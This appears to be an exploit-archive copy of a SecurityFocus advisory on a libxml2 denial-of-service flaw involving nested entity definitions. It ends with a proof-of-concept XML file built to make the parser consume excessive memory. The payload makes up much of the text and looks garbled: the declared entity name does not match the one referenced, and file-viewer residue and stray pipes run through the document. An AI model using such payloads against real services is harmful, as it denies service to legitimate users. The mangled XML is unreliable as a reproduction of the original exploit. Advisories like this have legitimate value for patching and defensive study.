15 lines
No EOL
503 B
XML
15 lines
No EOL
503 B
XML
source: http://www.securityfocus.com/bid/31555/info
|
|
|
|
The libxml2 library is prone to a denial-of-service vulnerability caused by an error when handling files using entities in entity definitions.
|
|
|
|
An attacker can exploit this issue to cause the library to consume an excessive amount of memory, denying service to legitimate users.
|
|
|
|
The issue affects libxml2 2.7 prior to 2.7.2.
|
|
|
|
XML file:
|
|
|
|
<?xml version='1.0' ?>
|
|
<!DOCTYPE test [
|
|
<!ENTITY ampproblem '&'>
|
|
]>
|
|
<t a="&problem;">a</t> |